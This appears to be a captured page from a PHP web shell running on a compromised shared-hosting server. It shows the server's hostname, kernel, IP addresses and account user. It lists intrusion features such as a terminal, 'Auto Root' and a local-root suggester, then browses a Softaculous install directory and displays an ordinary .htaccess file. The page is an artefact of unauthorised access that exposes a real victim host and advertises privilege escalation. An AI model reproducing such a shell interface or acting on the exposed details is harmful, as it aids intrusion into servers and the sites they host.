Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
ninja4 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-05-03 19:25
php53
[ DIR ]
drwxr-xr-x
2024-05-03 19:25
php56
[ DIR ]
drwxr-xr-x
2024-05-03 19:25
php71
[ DIR ]
drwxr-xr-x
2024-05-03 19:25
php81
[ DIR ]
drwxr-xr-x
2024-05-03 19:25
php82
[ DIR ]
drwxr-xr-x
2024-05-03 19:25
.env
518
B
-rw-r--r--
2021-12-23 00:54
.htaccess
6.09
KB
-rw-r--r--
2021-12-23 00:54
clone.php
6.49
KB
-rw-r--r--
2024-05-02 02:13
edit.php
4.23
KB
-rw-r--r--
2024-05-02 02:13
edit.xml
447
B
-rw-r--r--
2021-12-23 00:54
extend.php
8.99
KB
-rw-r--r--
2024-05-02 02:13
fileindex.php
418
B
-rw-r--r--
2021-12-23 00:54
import.php
4.69
KB
-rw-r--r--
2024-05-02 02:13
info.xml
4.56
KB
-rw-r--r--
2024-05-02 00:25
install.js
921
B
-rw-r--r--
2021-12-23 00:54
install.php
7.55
KB
-rw-r--r--
2024-05-02 02:13
install.xml
1016
B
-rw-r--r--
2021-12-23 00:54
md5
1.96
KB
-rw-r--r--
2024-05-02 02:13
ninja4.sql
356.58
KB
-rw-r--r--
2024-05-03 19:25
ninja4.zip
164.92
MB
-rw-r--r--
2024-05-03 19:25
notes.txt
1.22
KB
-rw-r--r--
2022-03-22 00:36
remove.php
2.09
KB
-rw-r--r--
2024-05-02 02:13
update_pass.php
541
B
-rw-r--r--
2021-12-23 00:54
upgrade.php
4.56
KB
-rw-r--r--
2024-05-02 02:13
upgrade.xml
302
B
-rw-r--r--
2021-12-23 00:54
version.txt
6
B
-rw-r--r--
2022-03-22 00:36
Save
Rename
<IfModule mod_rewrite.c> RewriteEngine On RewriteRule "^.env" - [F,L] RewriteRule "^storage" - [F,L] RewriteRule ^(.well-known)($|/) - [L] # https://coderwall.com/p/erbaig/laravel-s-htaccess-to-remove-public-from-url # RewriteRule ^(.*)$ public/$1 [L] </IfModule> # https://github.com/h5bp/server-configs-apache/blob/master/dist/.htaccess # ###################################################################### # # INTERNET EXPLORER # # ###################################################################### # ---------------------------------------------------------------------- # | Iframes cookies | # ---------------------------------------------------------------------- # Allow cookies to be set from iframes in Internet Explorer. # # https://msdn.microsoft.com/en-us/library/ms537343.aspx # http://www.w3.org/TR/2000/CR-P3P-20001215/ <IfModule mod_headers.c> Header set P3P "policyref=\"/w3c/p3p.xml\", CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"" </IfModule> # ###################################################################### # # MEDIA TYPES AND CHARACTER ENCODINGS # # ###################################################################### # ---------------------------------------------------------------------- # | Character encodings | # ---------------------------------------------------------------------- # Serve all resources labeled as `text/html` or `text/plain` # with the media type `charset` parameter set to `UTF-8`. # # https://httpd.apache.org/docs/current/mod/core.html#adddefaultcharset AddDefaultCharset utf-8 # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # Serve the following file types with the media type `charset` # parameter set to `UTF-8`. # # https://httpd.apache.org/docs/current/mod/mod_mime.html#addcharset <IfModule mod_mime.c> AddCharset utf-8 .atom \ .bbaw \ .css \ .geojson \ .js \ .json \ .jsonld \ .manifest \ .rdf \ .rss \ .topojson \ .vtt \ .webapp \ .webmanifest \ .xloc \ .xml </IfModule> # ###################################################################### # # WEB PERFORMANCE # # ###################################################################### # ---------------------------------------------------------------------- # | Compression | # ---------------------------------------------------------------------- <IfModule mod_deflate.c> # Force compression for mangled headers. # https://developer.yahoo.com/blogs/ydn/pushing-beyond-gzipping-25601.html <IfModule mod_setenvif.c> <IfModule mod_headers.c> SetEnvIfNoCase ^(Accept-EncodXng|X-cept-Encoding|X{15}|~{15}|-{15})$ ^((gzip|deflate)\s*,?\s*)+|[X~-]{4,13}$ HAVE_Accept-Encoding RequestHeader append Accept-Encoding "gzip,deflate" env=HAVE_Accept-Encoding </IfModule> </IfModule> # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # Map certain file types to the specified encoding type in order to # make Apache serve them with the appropriate `Content-Encoding` HTTP # response header (this will NOT make Apache compress them!). # If the following file types wouldn't be served without the appropriate # `Content-Enable` HTTP response header, client applications (e.g.: # browsers) wouldn't know that they first need to uncompress the response, # and thus, wouldn't be able to understand the content. # http://httpd.apache.org/docs/current/mod/mod_mime.html#addencoding <IfModule mod_mime.c> AddEncoding gzip svgz </IfModule> # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # Compress all output labeled with one of the following media types. # IMPORTANT: For Apache versions below 2.3.7 you don't need to enable # `mod_filter` and can remove the `<IfModule mod_filter.c>` & `</IfModule>` # lines as `AddOutputFilterByType` is still in the core directives. <IfModule mod_filter.c> AddOutputFilterByType DEFLATE "application/atom+xml" \ "application/javascript" \ "application/json" \ "application/ld+json" \ "application/manifest+json" \ "application/rdf+xml" \ "application/rss+xml" \ "application/schema+json" \ "application/vnd.geo+json" \ "application/vnd.ms-fontobject" \ "application/x-font-ttf" \ "application/x-web-app-manifest+json" \ "application/xhtml+xml" \ "application/xml" \ "font/opentype" \ "image/svg+xml" \ "image/x-icon" \ "text/cache-manifest" \ "text/css" \ "text/html" \ "text/javascript" \ "text/plain" \ "text/vtt" \ "text/x-component" \ "text/xml" </IfModule> </IfModule> <IfModule mod_alias.c> RedirectMatch 301 ^[[relativeurl]]/$ [[softurl]]/public </IfModule>